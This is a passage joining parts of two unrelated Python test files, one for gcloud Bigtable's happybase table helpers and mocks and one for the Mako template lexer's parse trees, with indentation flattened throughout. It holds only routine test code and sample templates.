self.assertEqual(self._callFUT(b'boa\xff'), b'bob')
def test_with_empty_string(self):
self.assertEqual(self._callFUT(b''), b'')
def test_with_all_last_bytes(self):
self.assertEqual(self._callFUT(b'\xff\xff\xff'), b'')
def test_with_unicode_input(self):
self.assertEqual(self._callFUT(u'boa'), b'bob')
class Test__convert_to_time_range(unittest2.TestCase):
def _callFUT(self, timestamp=None):
from gcloud.bigtable.happybase.table import _convert_to_time_range
return _convert_to_time_range(timestamp=timestamp)
def test_null(self):
timestamp = None
result = self._callFUT(timestamp=timestamp)
self.assertEqual(result, None)
def test_invalid_type(self):
timestamp = object()
with self.assertRaises(TypeError):
self._callFUT(timestamp=timestamp)
def test_success(self):
from gcloud._helpers import _datetime_from_microseconds
from gcloud.bigtable.row_filters import TimestampRange
timestamp = 1441928298571
ts_dt = _datetime_from_microseconds(1000 * timestamp)
result = self._callFUT(timestamp=timestamp)
self.assertTrue(isinstance(result, TimestampRange))
self.assertEqual(result.start, None)
self.assertEqual(result.end, ts_dt)
class Test__cells_to_pairs(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _cells_to_pairs
return _cells_to_pairs(*args, **kwargs)
def test_without_timestamp(self):
from gcloud.bigtable.row_data import Cell
value1 = 'foo'
cell1 = Cell(value=value1, timestamp=None)
value2 = 'bar'
cell2 = Cell(value=value2, timestamp=None)
result = self._callFUT([cell1, cell2])
self.assertEqual(result, [value1, value2])
def test_with_timestamp(self):
from gcloud._helpers import _datetime_from_microseconds
from gcloud.bigtable.row_data import Cell
value1 = 'foo'
ts1_millis = 1221934570148
ts1 = _datetime_from_microseconds(ts1_millis * 1000)
cell1 = Cell(value=value1, timestamp=ts1)
value2 = 'bar'
ts2_millis = 1221955575548
ts2 = _datetime_from_microseconds(ts2_millis * 1000)
cell2 = Cell(value=value2, timestamp=ts2)
result = self._callFUT([cell1, cell2], include_timestamp=True)
self.assertEqual(result,
[(value1, ts1_millis), (value2, ts2_millis)])
class Test__partial_row_to_dict(unittest2.TestCase):
def _callFUT(self, partial_row_data, include_timestamp=False):
from gcloud.bigtable.happybase.table import _partial_row_to_dict
return _partial_row_to_dict(partial_row_data,
include_timestamp=include_timestamp)
def test_without_timestamp(self):
from gcloud.bigtable.row_data import Cell
from gcloud.bigtable.row_data import PartialRowData
row_data = PartialRowData(b'row-key')
val1 = b'hi-im-bytes'
val2 = b'bi-im-hytes'
row_data._cells[u'fam1'] = {
b'col1': [Cell(val1, None)],
b'col2': [Cell(val2, None)],
}
result = self._callFUT(row_data)
expected_result = {
b'fam1:col1': val1,
b'fam1:col2': val2,
}
self.assertEqual(result, expected_result)
def test_with_timestamp(self):
from gcloud._helpers import _datetime_from_microseconds
from gcloud.bigtable.row_data import Cell
from gcloud.bigtable.row_data import PartialRowData
row_data = PartialRowData(b'row-key')
val1 = b'hi-im-bytes'
ts1_millis = 1221934570148
ts1 = _datetime_from_microseconds(ts1_millis * 1000)
val2 = b'bi-im-hytes'
ts2_millis = 1331934880000
ts2 = _datetime_from_microseconds(ts2_millis * 1000)
row_data._cells[u'fam1'] = {
b'col1': [Cell(val1, ts1)],
b'col2': [Cell(val2, ts2)],
}
result = self._callFUT(row_data, include_timestamp=True)
expected_result = {
b'fam1:col1': (val1, ts1_millis),
b'fam1:col2': (val2, ts2_millis),
}
self.assertEqual(result, expected_result)
class Test__filter_chain_helper(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _filter_chain_helper
return _filter_chain_helper(*args, **kwargs)
def test_no_filters(self):
with self.assertRaises(ValueError):
self._callFUT()
def test_single_filter(self):
from gcloud.bigtable.row_filters import CellsColumnLimitFilter
versions = 1337
result = self._callFUT(versions=versions)
self.assertTrue(isinstance(result, CellsColumnLimitFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
self.assertEqual(result.num_cells, versions)
def test_existing_filters(self):
from gcloud.bigtable.row_filters import CellsColumnLimitFilter
filters = []
versions = 1337
result = self._callFUT(versions=versions, filters=filters)
# Make sure filters has grown.
self.assertEqual(filters, [result])
self.assertTrue(isinstance(result, CellsColumnLimitFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
self.assertEqual(result.num_cells, versions)
def _column_helper(self, num_filters, versions=None, timestamp=None,
column=None, col_fam=None, qual=None):
from gcloud.bigtable.row_filters import ColumnQualifierRegexFilter
from gcloud.bigtable.row_filters import FamilyNameRegexFilter
from gcloud.bigtable.row_filters import RowFilterChain
if col_fam is None:
col_fam = 'cf1'
if qual is None:
qual = 'qual'
if column is None:
column = col_fam + ':' + qual
result = self._callFUT(column, versions=versions, timestamp=timestamp)
self.assertTrue(isinstance(result, RowFilterChain))
self.assertEqual(len(result.filters), num_filters)
fam_filter = result.filters[0]
qual_filter = result.filters[1]
self.assertTrue(isinstance(fam_filter, FamilyNameRegexFilter))
self.assertTrue(isinstance(qual_filter, ColumnQualifierRegexFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
self.assertEqual(fam_filter.regex, col_fam.encode('utf-8'))
self.assertEqual(qual_filter.regex, qual.encode('utf-8'))
return result
def test_column_only(self):
self._column_helper(num_filters=2)
def test_column_bytes(self):
self._column_helper(num_filters=2, column=b'cfB:qualY',
col_fam=u'cfB', qual=u'qualY')
def test_column_unicode(self):
self._column_helper(num_filters=2, column=u'cfU:qualN',
col_fam=u'cfU', qual=u'qualN')
def test_with_versions(self):
from gcloud.bigtable.row_filters import CellsColumnLimitFilter
versions = 11
result = self._column_helper(num_filters=3, versions=versions)
version_filter = result.filters[2]
self.assertTrue(isinstance(version_filter, CellsColumnLimitFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
self.assertEqual(version_filter.num_cells, versions)
def test_with_timestamp(self):
from gcloud._helpers import _datetime_from_microseconds
from gcloud.bigtable.row_filters import TimestampRange
from gcloud.bigtable.row_filters import TimestampRangeFilter
timestamp = 1441928298571
result = self._column_helper(num_filters=3, timestamp=timestamp)
range_filter = result.filters[2]
self.assertTrue(isinstance(range_filter, TimestampRangeFilter))
# Relies on the fact that RowFilter instances can
# only have one value set.
time_range = range_filter.range_
self.assertTrue(isinstance(time_range, TimestampRange))
self.assertEqual(time_range.start, None)
ts_dt = _datetime_from_microseconds(1000 * timestamp)
self.assertEqual(time_range.end, ts_dt)
def test_with_all_options(self):
versions = 11
timestamp = 1441928298571
self._column_helper(num_filters=4, versions=versions,
timestamp=timestamp)
class Test__columns_filter_helper(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _columns_filter_helper
return _columns_filter_helper(*args, **kwargs)
def test_no_columns(self):
columns = []
with self.assertRaises(ValueError):
self._callFUT(columns)
def test_single_column(self):
from gcloud.bigtable.row_filters import FamilyNameRegexFilter
col_fam = 'cf1'
columns = [col_fam]
result = self._callFUT(columns)
expected_result = FamilyNameRegexFilter(col_fam)
self.assertEqual(result, expected_result)
def test_column_and_column_families(self):
from gcloud.bigtable.row_filters import ColumnQualifierRegexFilter
from gcloud.bigtable.row_filters import FamilyNameRegexFilter
from gcloud.bigtable.row_filters import RowFilterChain
from gcloud.bigtable.row_filters import RowFilterUnion
col_fam1 = 'cf1'
col_fam2 = 'cf2'
col_qual2 = 'qual2'
columns = [col_fam1, col_fam2 + ':' + col_qual2]
result = self._callFUT(columns)
self.assertTrue(isinstance(result, RowFilterUnion))
self.assertEqual(len(result.filters), 2)
filter1 = result.filters[0]
filter2 = result.filters[1]
self.assertTrue(isinstance(filter1, FamilyNameRegexFilter))
self.assertEqual(filter1.regex, col_fam1.encode('utf-8'))
self.assertTrue(isinstance(filter2, RowFilterChain))
filter2a, filter2b = filter2.filters
self.assertTrue(isinstance(filter2a, FamilyNameRegexFilter))
self.assertEqual(filter2a.regex, col_fam2.encode('utf-8'))
self.assertTrue(isinstance(filter2b, ColumnQualifierRegexFilter))
self.assertEqual(filter2b.regex, col_qual2.encode('utf-8'))
class Test__row_keys_filter_helper(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _row_keys_filter_helper
return _row_keys_filter_helper(*args, **kwargs)
def test_no_rows(self):
row_keys = []
with self.assertRaises(ValueError):
self._callFUT(row_keys)
def test_single_row(self):
from gcloud.bigtable.row_filters import RowKeyRegexFilter
row_key = b'row-key'
row_keys = [row_key]
result = self._callFUT(row_keys)
expected_result = RowKeyRegexFilter(row_key)
self.assertEqual(result, expected_result)
def test_many_rows(self):
from gcloud.bigtable.row_filters import RowFilterUnion
from gcloud.bigtable.row_filters import RowKeyRegexFilter
row_key1 = b'row-key1'
row_key2 = b'row-key2'
row_key3 = b'row-key3'
row_keys = [row_key1, row_key2, row_key3]
result = self._callFUT(row_keys)
filter1 = RowKeyRegexFilter(row_key1)
filter2 = RowKeyRegexFilter(row_key2)
filter3 = RowKeyRegexFilter(row_key3)
expected_result = RowFilterUnion(filters=[filter1, filter2, filter3])
self.assertEqual(result, expected_result)
class _Connection(object):
def __init__(self, instance):
self._instance = instance
class _MockLowLevelColumnFamily(object):
def __init__(self, column_family_id, gc_rule=None):
self.column_family_id = column_family_id
self.gc_rule = gc_rule
class _MockLowLevelTable(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.list_column_families_calls = 0
self.column_families = {}
self.row_values = {}
self.read_row_calls = []
self.read_row_result = None
self.read_rows_calls = []
self.read_rows_result = None
def list_column_families(self):
self.list_column_families_calls += 1
return self.column_families
def row(self, row_key, append=None):
result = self.row_values[row_key]
result._append = append
return result
def read_row(self, *args, **kwargs):
self.read_row_calls.append((args, kwargs))
return self.read_row_result
def read_rows(self, *args, **kwargs):
self.read_rows_calls.append((args, kwargs))
return self.read_rows_result
class _MockLowLevelRow(object):
COUNTER_DEFAULT = 0
def __init__(self, row_key, commit_result=None):
self.row_key = row_key
self._append = False
self.counts = {}
self.commit_result = commit_result
def increment_cell_value(self, column_family_id, column, int_value):
count = self.counts.setdefault((column_family_id, column),
self.COUNTER_DEFAULT)
self.counts[(column_family_id, column)] = count + int_value
def commit(self):
return self.commit_result
class _MockBatch(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.exit_vals = []
self.put_args = []
self.delete_args = []
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.exit_vals.append((exc_type, exc_value, traceback))
def put(self, *args):
self.put_args.append(args)
def delete(self, *args):
self.delete_args.append(args)
class _MockPartialRowsData(object):
def __init__(self, rows=None, iterations=0):
self.rows = rows or {}
self.consume_all_calls = 0
self.consume_next_calls = 0
self.iterations = iterations
def consume_all(self):
self.consume_all_calls += 1
def consume_next(self):
self.consume_next_calls += 1
if self.consume_next_calls > self.iterations:
raise StopIteration
|
|
from mako.lexer import Lexer
from mako import exceptions, util, compat
from test.util import flatten_result
from mako.template import Template
import re
from test import TemplateTest, eq_, assert_raises_message
# create fake parsetree classes which are constructed
# exactly as the repr() of a real parsetree object.
# this allows us to use a Python construct as the source
# of a comparable repr(), which is also hit by the 2to3 tool.
def repr_arg(x):
if isinstance(x, dict):
return util.sorted_dict_repr(x)
else:
return repr(x)
def _as_unicode(arg):
if isinstance(arg, compat.string_types):
return compat.text_type(arg)
elif isinstance(arg, dict):
return dict(
(_as_unicode(k), _as_unicode(v))
for k, v in arg.items()
)
else:
return arg
from mako import parsetree
for cls in list(parsetree.__dict__.values()):
if isinstance(cls, type) and \
issubclass(cls, parsetree.Node):
clsname = cls.__name__
exec(("""
class %s(object):
def __init__(self, *args):
self.args = [_as_unicode(arg) for arg in args]
def __repr__(self):
return "%%s(%%s)" %% (
self.__class__.__name__,
", ".join(repr_arg(x) for x in self.args)
)
""" % clsname), locals())
# NOTE: most assertion expressions were generated, then formatted
# by PyTidy, hence the dense formatting.
class LexerTest(TemplateTest):
def _compare(self, node, expected):
eq_(repr(node), repr(expected))
def test_text_and_tag(self):
template = """
<b>Hello world</b>
<%def name="foo()">
this is a def.
</%def>
and some more text.
"""
node = Lexer(template).parse()
self._compare(node, TemplateNode({},
[Text('''\n<b>Hello world</b>\n ''', (1,
1)), DefTag('def', {'name': 'foo()'}, (3, 9),
[Text('''\n this is a def.\n ''',
(3, 28))]),
Text('''\n\n and some more text.\n''',
(5, 16))]))
def test_unclosed_tag(self):
template = """
<%def name="foo()">
other text
"""
try:
nodes = Lexer(template).parse()
assert False
except exceptions.SyntaxException:
eq_(
str(compat.exception_as()),
"Unclosed tag: <%def> at line: 5 char: 9"
)
def test_onlyclosed_tag(self):
template = \
"""
<%def name="foo()">
foo
</%def>
</%namespace>
hi.
"""
self.assertRaises(exceptions.SyntaxException,
Lexer(template).parse)
def test_noexpr_allowed(self):
template = \
"""
<%namespace name="${foo}"/>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_unmatched_tag(self):
template = \
"""
<%namespace name="bar">
<%def name="foo()">
foo
</%namespace>
</%def>
hi.
"""
self.assertRaises(exceptions.SyntaxException,
Lexer(template).parse)
def test_nonexistent_tag(self):
template = """
<%lala x="5"/>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_wrongcase_tag(self):
template = \
"""
<%DEF name="foo()">
</%def>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_percent_escape(self):
template = \
"""
%% some whatever.
%% more some whatever
% if foo:
% endif
"""
node = Lexer(template).parse()
self._compare(node, TemplateNode({}, [Text('''\n\n''',
(1, 1)), Text('''% some whatever.\n\n''', (3, 2)),
Text(' %% more some whatever\n', (5, 2)),
ControlLine('if', 'if foo:', False, (6, 1)),
ControlLine('if', 'endif', True, (7, 1)),
Text(' ', (8, 1))]))
def test_old_multiline_comment(self):
template = """#*"""
node = Lexer(template).parse()
self._compare(node, TemplateNode({}, [Text('''#*''', (1, 1))]))
def test_text_tag(self):
template = \
"""
## comment
% if foo:
hi
% endif
<%text>
# more code
% more code
<%illegal compionent>/></>
<%def name="laal()">def</%def>
</%text>
<%def name="foo()">this is foo</%def>
% if bar:
code
% endif
"""
node = Lexer(template).parse()
self._compare(node,
TemplateNode({}, [Text('\n', (1, 1)),
Comment('comment', (2, 1)),
ControlLine('if', 'if foo:', False, (3, 1)),
Text(' hi\n', (4, 1)),
ControlLine('if', 'endif', True, (5, 1)),
Text(' ', (6, 1)),
TextTag('text', {}, (6, 9),
[Text('\n # more code\n\n '
' % more code\n <%illegal compionent>/></>\n'
' <%def name="laal()">def</%def>\n\n\n ',
(6, 16))]), Text('\n\n ', (14, 17)),
DefTag('def', {'name': 'foo()'}, (16, 9),
[Text('this is foo', (16, 28))]), Text('\n\n', (16, 46)),
ControlLine('if', 'if bar:', False, (18, 1)),
Text(' code\n', (19, 1)),
ControlLine('if', 'endif', True, (20, 1)),
Text(' ', (21, 1))])
)
def test_def_syntax(self):
template = \
"""
<%def lala>
hi
</%def>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_def_syntax_2(self):
template = \
"""
<%def name="lala">
hi
</%def>
"""
self.assertRaises(exceptions.CompileException,
Lexer(template).parse)
def test_whitespace_equals(self):
template = \
"""
<%def name = "adef()" >
adef
</%def>
"""
node = Lexer(template).parse()
self._compare(node, TemplateNode({}, [Text('\n ',
(1, 1)), DefTag('def', {'name': 'adef()'}, (2,
13),
[Text('''\n adef\n ''',
(2, 36))]), Text('\n ', (4, 20))]))
def test_ns_tag_closed(self):
template = \
"""
<%self:go x="1" y="2" z="${'hi' + ' ' + 'there'}"/>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''
''', (1, 1)),
CallNamespaceTag('self:go', {'x': '1', 'y'
: '2', 'z': "${'hi' + ' ' + 'there'}"}, (3,
13), []), Text('\n ', (3, 64))]))
def test_ns_tag_empty(self):
template = \
"""
<%form:option value=""></%form:option>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n ',
(1, 1)), CallNamespaceTag('form:option',
{'value': ''}, (2, 13), []), Text('\n '
, (2, 51))]))
def test_ns_tag_open(self):
template = \
"""
<%self:go x="1" y="${process()}">
this is the body
</%self:go>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''
''', (1, 1)),
CallNamespaceTag('self:go', {'x': '1', 'y'
: '${process()}'}, (3, 13),
[Text('''
this is the body
''',
(3, 46))]), Text('\n ', (5, 24))]))
def test_expr_in_attribute(self):
"""test some slightly trickier expressions.
        you can still trip up the expression parsing, though, unless we
        integrate really deeply with the AST."""
template = \
"""
<%call expr="foo>bar and 'lala' or 'hoho'"/>
<%call expr='foo<bar and hoho>lala and "x" + "y"'/>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n ',
(1, 1)), CallTag('call', {'expr'
: "foo>bar and 'lala' or 'hoho'"}, (2, 13), []),
Text('\n ', (2, 57)), CallTag('call'
, {'expr': 'foo<bar and hoho>lala and "x" + "y"'
}, (3, 13), []), Text('\n ', (3, 64))]))
def test_pagetag(self):
template = \
"""
<%page cached="True", args="a, b"/>
some template
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n ',
(1, 1)), PageTag('page', {'args': 'a, b',
'cached': 'True'}, (2, 13), []),
Text('''
some template
''',
(2, 48))]))
def test_nesting(self):
template = \
"""
<%namespace name="ns">
<%def name="lala(hi, there)">
<%call expr="something()"/>
</%def>
</%namespace>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''
''', (1, 1)),
NamespaceTag('namespace', {'name': 'ns'}, (3,
9), [Text('\n ', (3, 31)),
DefTag('def', {'name': 'lala(hi, there)'}, (4,
13), [Text('\n ', (4, 42)),
CallTag('call', {'expr': 'something()'}, (5,
17), []), Text('\n ', (5, 44))]),
Text('\n ', (6, 20))]),
Text('''
''', (7, 22))]))
if compat.py3k:
def test_code(self):
template = \
"""text
<%
print("hi")
for x in range(1,5):
print(x)
%>
more text
<%!
import foo
%>
"""
nodes = Lexer(template).parse()
self._compare(nodes,
TemplateNode({}, [
Text('text\n ', (1, 1)),
Code('\nprint("hi")\nfor x in range(1,5):\n '
'print(x)\n \n', False, (2, 5)),
Text('\nmore text\n ', (6, 7)),
Code('\nimport foo\n \n', True, (8, 5)),
Text('\n', (10, 7))])
)
else:
def test_code(self):
template = \
"""text
<%
print "hi"
for x in range(1,5):
print x
%>
more text
<%!
import foo
%>
"""
nodes = Lexer(template).parse()
self._compare(nodes,
TemplateNode({}, [
Text('text\n ', (1, 1)),
Code('\nprint "hi"\nfor x in range(1,5):\n '
'print x\n \n', False, (2, 5)),
Text('\nmore text\n ', (6, 7)),
Code('\nimport foo\n \n', True, (8, 5)),
Text('\n', (10, 7))])
)
def test_code_and_tags(self):
template = \
"""
<%namespace name="foo">
<%def name="x()">
this is x
</%def>
<%def name="y()">
this is y
</%def>
</%namespace>
<%
result = []
data = get_data()
for x in data:
result.append(x+7)
%>
result: <%call expr="foo.x(result)"/>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n', (1, 1)),
NamespaceTag('namespace', {'name': 'foo'}, (2,
1), [Text('\n ', (2, 24)), DefTag('def',
{'name': 'x()'}, (3, 5),
[Text('''\n this is x\n ''', (3, 22))]),
Text('\n ', (5, 12)), DefTag('def', {'name'
: 'y()'}, (6, 5),
[Text('''\n this is y\n ''', (6, 22))]),
Text('\n', (8, 12))]), Text('''\n\n''', (9, 14)),
Code('''\nresult = []\ndata = get_data()\n'''
'''for x in data:\n result.append(x+7)\n\n''',
False, (11, 1)), Text('''\n\n result: ''', (16,
3)), CallTag('call', {'expr': 'foo.x(result)'
}, (18, 13), []), Text('\n', (18, 42))]))
def test_expression(self):
template = \
"""
this is some ${text} and this is ${textwith | escapes, moreescapes}
<%def name="hi()">
give me ${foo()} and ${bar()}
</%def>
${hi()}
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('\n this is some ', (1, 1)),
Expression('text', [], (2, 22)),
Text(' and this is ', (2, 29)),
Expression('textwith ', ['escapes', 'moreescapes'
], (2, 42)), Text('\n ', (2, 76)),
DefTag('def', {'name': 'hi()'}, (3, 9),
[Text('\n give me ', (3, 27)),
Expression('foo()', [], (4, 21)), Text(' and ',
(4, 29)), Expression('bar()', [], (4, 34)),
Text('\n ', (4, 42))]), Text('\n '
, (5, 16)), Expression('hi()', [], (6, 9)),
Text('\n', (6, 16))]))
def test_tricky_expression(self):
template = """
${x and "|" or "hi"}
"""
nodes = Lexer(template).parse()
self._compare(
nodes,
TemplateNode({}, [
Text('\n\n ', (1, 1)),
Expression('x and "|" or "hi"', [], (3, 13)),
Text('\n ', (3, 33))
])
)
template = """
${hello + '''heres '{|}' text | | }''' | escape1}
"""
nodes = Lexer(template).parse()
self._compare(
nodes,
TemplateNode({}, [
Text('\n\n ', (1, 1)),
Expression("hello + '''heres '{|}' text | | }''' ",
['escape1'], (3, 13)),
Text('\n ', (3, 62))
])
)
def test_tricky_code(self):
if compat.py3k:
template = """<% print('hi %>') %>"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("print('hi %>') \n", False, (1, 1))]))
else:
template = """<% print 'hi %>' %>"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("print 'hi %>' \n", False, (1, 1))]))
def test_tricky_code_2(self):
template = \
"""<%
# someone's comment
%>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("""
# someone's comment
""",
False, (1, 1)), Text('\n ', (3, 3))]))
if compat.py3k:
def test_tricky_code_3(self):
template = \
"""<%
print('hi')
# this is a comment
# another comment
x = 7 # someone's '''comment
print('''
there
''')
# someone else's comment
%> '''and now some text '''"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("""
print('hi')
# this is a comment
# another comment
x = 7 # someone's '''comment
print('''
there
''')
# someone else's comment
""",
False, (1, 1)),
Text(" '''and now some text '''", (10,
3))]))
else:
def test_tricky_code_3(self):
template = \
"""<%
print 'hi'
# this is a comment
# another comment
x = 7 # someone's '''comment
print '''
there
'''
# someone else's comment
%> '''and now some text '''"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("""\nprint 'hi'\n# this is a comment\n"""
"""# another comment\nx = 7 """
"""# someone's '''comment\nprint '''\n """
"""there\n '''\n# someone else's """
"""comment\n\n""",
False, (1, 1)),
Text(" '''and now some text '''", (10, 3))]))
def test_tricky_code_4(self):
template = \
"""<% foo = "\\"\\\\" %>"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Code("""foo = "\\"\\\\" \n""",
False, (1, 1))]))
def test_tricky_code_5(self):
template = \
"""before ${ {'key': 'value'} } after"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('before ', (1, 1)),
Expression(" {'key': 'value'} ", [], (1, 8)),
Text(' after', (1, 29))]))
def test_control_lines(self):
template = \
"""
text text la la
% if foo():
mroe text la la blah blah
% endif
and osme more stuff
% for l in range(1,5):
tex tesl asdl l is ${l} kfmas d
% endfor
tetx text
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''\ntext text la la\n''', (1, 1)),
ControlLine('if', 'if foo():', False, (3, 1)),
Text(' mroe text la la blah blah\n', (4, 1)),
ControlLine('if', 'endif', True, (5, 1)),
Text('''\n and osme more stuff\n''', (6,
1)), ControlLine('for', 'for l in range(1,5):',
False, (8, 1)), Text(' tex tesl asdl l is ',
(9, 1)), Expression('l', [], (9, 24)),
Text(' kfmas d\n', (9, 28)), ControlLine('for',
'endfor', True, (10, 1)),
Text(''' tetx text\n\n''', (11, 1))]))
def test_control_lines_2(self):
template = \
"""% for file in requestattr['toc'].filenames:
x
% endfor
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [ControlLine('for',
"for file in requestattr['toc'].filenames:",
False, (1, 1)), Text(' x\n', (2, 1)),
ControlLine('for', 'endfor', True, (3, 1))]))
def test_long_control_lines(self):
template = \
"""
% for file in \\
requestattr['toc'].filenames:
x
% endfor
"""
nodes = Lexer(template).parse()
self._compare(
nodes,
TemplateNode({}, [
Text('\n', (1, 1)),
ControlLine('for', "for file in \\\n "
"requestattr['toc'].filenames:",
False, (2, 1)),
Text(' x\n', (4, 1)),
ControlLine('for', 'endfor', True, (5, 1)),
Text(' ', (6, 1))
])
)
def test_unmatched_control(self):
template = """
% if foo:
% for x in range(1,5):
% endif
"""
assert_raises_message(
exceptions.SyntaxException,
"Keyword 'endif' doesn't match keyword 'for' at line: 5 char: 1",
Lexer(template).parse
)
def test_unmatched_control_2(self):
template = """
% if foo:
% for x in range(1,5):
% endfor
"""
assert_raises_message(
exceptions.SyntaxException,
"Unterminated control keyword: 'if' at line: 3 char: 1",
Lexer(template).parse
)
def test_unmatched_control_3(self):
template = """
% if foo:
% for x in range(1,5):
% endlala
% endif
"""
assert_raises_message(
exceptions.SyntaxException,
"Keyword 'endlala' doesn't match keyword 'for' at line: 5 char: 1",
Lexer(template).parse
)
def test_ternary_control(self):
template = \
"""
% if x:
hi
% elif y+7==10:
there
% elif lala:
lala
% else:
hi
% endif
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n', (1, 1)),
ControlLine('if', 'if x:', False, (2, 1)),
Text(' hi\n', (3, 1)),
ControlLine('elif', 'elif y+7==10:', False, (4,
1)), Text(' there\n', (5, 1)),
ControlLine('elif', 'elif lala:', False, (6,
1)), Text(' lala\n', (7, 1)),
ControlLine('else', 'else:', False, (8, 1)),
Text(' hi\n', (9, 1)),
ControlLine('if', 'endif', True, (10, 1))]))
def test_integration(self):
template = \
"""<%namespace name="foo" file="somefile.html"/>
## inherit from foobar.html
<%inherit file="foobar.html"/>
<%def name="header()">
<div>header</div>
</%def>
<%def name="footer()">
<div> footer</div>
</%def>
<table>
% for j in data():
<tr>
% for x in j:
<td>Hello ${x| h}</td>
% endfor
</tr>
% endfor
</table>
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [NamespaceTag('namespace'
, {'file': 'somefile.html', 'name': 'foo'},
(1, 1), []), Text('\n', (1, 46)),
Comment('inherit from foobar.html', (2, 1)),
InheritTag('inherit', {'file': 'foobar.html'},
(3, 1), []), Text('''\n\n''', (3, 31)),
DefTag('def', {'name': 'header()'}, (5, 1),
[Text('''\n <div>header</div>\n''', (5,
23))]), Text('\n', (7, 8)), DefTag('def',
{'name': 'footer()'}, (8, 1),
[Text('''\n <div> footer</div>\n''', (8,
23))]), Text('''\n\n<table>\n''', (10, 8)),
ControlLine('for', 'for j in data():', False,
(13, 1)), Text(' <tr>\n', (14, 1)),
ControlLine('for', 'for x in j:', False, (15,
1)), Text(' <td>Hello ', (16, 1)),
Expression('x', ['h'], (16, 23)), Text('</td>\n'
, (16, 30)), ControlLine('for', 'endfor', True,
(17, 1)), Text(' </tr>\n', (18, 1)),
ControlLine('for', 'endfor', True, (19, 1)),
Text('</table>\n', (20, 1))]))
def test_comment_after_statement(self):
template = \
"""
% if x: #comment
hi
% else: #next
hi
% endif #end
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({}, [Text('\n', (1, 1)),
ControlLine('if', 'if x: #comment', False, (2,
1)), Text(' hi\n', (3, 1)),
ControlLine('else', 'else: #next', False, (4,
1)), Text(' hi\n', (5, 1)),
ControlLine('if', 'endif #end', True, (6, 1))]))
def test_crlf(self):
template = util.read_file(self._file_path("crlf.html"))
nodes = Lexer(template).parse()
self._compare(
nodes,
TemplateNode({}, [
Text('<html>\r\n\r\n', (1, 1)),
PageTag('page', {
'args': "a=['foo',\n 'bar']"
}, (3, 1), []),
Text('\r\n\r\nlike the name says.\r\n\r\n', (4, 26)),
ControlLine('for', 'for x in [1,2,3]:', False, (8, 1)),
Text(' ', (9, 1)),
Expression('x', [], (9, 9)),
ControlLine('for', 'endfor', True, (10, 1)),
Text('\r\n', (11, 1)),
Expression("trumpeter == 'Miles' and "
"trumpeter or \\\n 'Dizzy'",
[], (12, 1)),
Text('\r\n\r\n', (13, 15)),
DefTag('def', {'name': 'hi()'}, (15, 1), [
Text('\r\n hi!\r\n', (15, 19))]),
Text('\r\n\r\n</html>\r\n', (17, 8))
])
)
assert flatten_result(Template(template).render()) \
== """<html> like the name says. 1 2 3 Dizzy </html>"""
def test_comments(self):
template = \
"""
<style>
#someselector
# other non comment stuff
</style>
## a comment
# also not a comment
## this is a comment
this is ## not a comment
<%doc> multiline
comment
</%doc>
hi
"""
nodes = Lexer(template).parse()
self._compare(nodes, TemplateNode({},
[Text('''\n<style>\n #someselector\n # '''
'''other non comment stuff\n</style>\n''',
(1, 1)), Comment('a comment', (6, 1)),
Text('''\n# also not a comment\n\n''', (7, 1)),
Comment('this is a comment', (10, 1)),
Text('''\nthis is ## not a comment\n\n''', (11,
1)), Comment(''' multiline\ncomment\n''', (14,
1)), Text('''
hi
''', (16, 8))]))
def test_docs(self):
template = \
"""
<%doc>
this is a comment
</%doc>
<%def name="foo()">
<%doc>
this is the foo func
</%doc>
</%def>
"""
nodes = Lexer(template).parse()
self._compare(nodes,
TemplateNode({}, [Text('\n ', (1,
1)),
Comment('''\n this is a comment\n ''',
(2, 9)), Text('\n ', (4, 16)),
DefTag('def', {'name': 'foo()'}, (5, 9),
[Text('\n ', (5, 28)),
Comment('''\n this is the foo func\n'''
''' ''',
(6, 13)), Text('\n ', (8, 20))]),
Text('\n ', (9, 16))]))
def test_preprocess(self):
def preproc(text):
return re.sub(r'(?<=\n)\s*#[^#]', '##', text)
template = \
"""
hi
# old style comment
# another comment
"""
nodes = Lexer(template, preprocessor=preproc).parse()
self._compare(nodes, TemplateNode({}, [Text('''\n hi\n''',
